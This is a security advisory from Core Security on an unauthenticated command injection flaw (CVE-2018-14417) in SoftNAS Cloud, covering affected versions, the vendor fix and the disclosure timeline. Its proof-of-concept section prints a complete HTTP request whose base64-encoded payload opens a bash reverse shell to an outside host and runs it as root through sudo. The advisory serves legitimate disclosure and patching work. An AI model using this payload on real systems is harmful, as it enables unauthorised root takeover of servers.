SoftNAS Cloud OS Command Injection

Advisory ID Internal
CORE-2018-0009

1. Advisory Information

Title: SoftNAS Cloud OS Command Injection
Advisory ID: CORE-2018-0009
Advisory URL: https://www.coresecurity.com/core-labs/advisories/softnas-cloud-os-command-injection
Date published: 2018-07-26
Date of last update: 2018-07-26
Vendors contacted: SoftNAS
Release mode: Coordinated release

2. Vulnerability Information

Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-14417

3. Vulnerability Description

SoftNAS' website states that:

[1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual storage appliance that runs within public, private or hybrid clouds. SoftNAS Cloud provides enterprise-grade NAS capabilities, including encryption, snapshots, rapid rollbacks, and cross-zone high-availability with automatic failover.

A command injection vulnerability was found in the web administration console. In particular, snserv script did not sanitize some input parameters before executing a system command.

4. Vulnerable Packages

  • SoftNAS Cloud versions prior to 4.0.3

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported vulnerability. The software update can be performed via the StorageCenter admin UI in the product. For more information on the updating process see: https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.

In addition, SoftNAS published the following release note: https://docs.softnas.com/display/SD/Release+Notes

6. Credits

The vulnerability was discovered and researched by Fernando Díaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. Technical Description / Proof of Concept Code

7.1. Check and execute update functionality abuse leading to command execution

[CVE-2018-14417] The 'recentVersion' parameter from the snserv endpoint is vulnerable to OS Command Injection when check and execute update operations are performed. This endpoint has no authentication/session verification. Therefore, it is possible for an unauthenticated attacker to execute malicious code in the target server. As the WebServer runs a Sudoer user (apache), the malicious code can be executed with root permissions.

The following part of the /etc/sudoers file shows the apache user capabilities.

User_Alias APACHE = apache # Once SoftNAS UI is operational, only allow the specific command that require sudo access!! Cmnd_Alias SOFTNAS = ALL APACHE ALL = (ALL) NOPASSWD: SOFTNAS 

The following proof of concept generates a remote shell on the target system as root:

GET /softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash; HTTP/1.1 Host: 10.2.45.208 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:// 10.2.45.208/softnas/applets/update/ X-Requested-With: XMLHttpRequest Connection: close 

As can be seen in the former request the payload had to be base64 encoded as some special characters were not being properly decoded.

8. Report Timeline

  • 2018-05-29: Core Security sent an initial notification to SoftNAS, including a draft advisory.
  • 2018-05-31: SoftNAS confirmed the reported vulnerability and informed they were working on a plan to fix the issue.
  • 2018-05-31: Core Security thanked the SoftNAS' reply.
  • 2018-06-15: Core Security requested a status update.
  • 2018-06-26: SoftNAS answered saying the fixed version was scheduled for late July.
  • 2018-06-26: Core Security thanked the update.
  • 2018-07-16: Core Security asked for a status update and requested a solidified release date.
  • 2018-07-16: SoftNAS informed that the new release version were under QA verification and they would have the release date during the week.
  • 2018-07-19: SoftNAS notified Core Security that SoftNAS Cloud 4.0.3 version was already available.
  • 2018-07-19: Core Security thanked SoftNAS's update and set July 26th as the publication date.
  • 2018-07-26: Advisory CORE-2018-0009 published.

9. References

[1] https://www.softnas.com

10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.  

11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/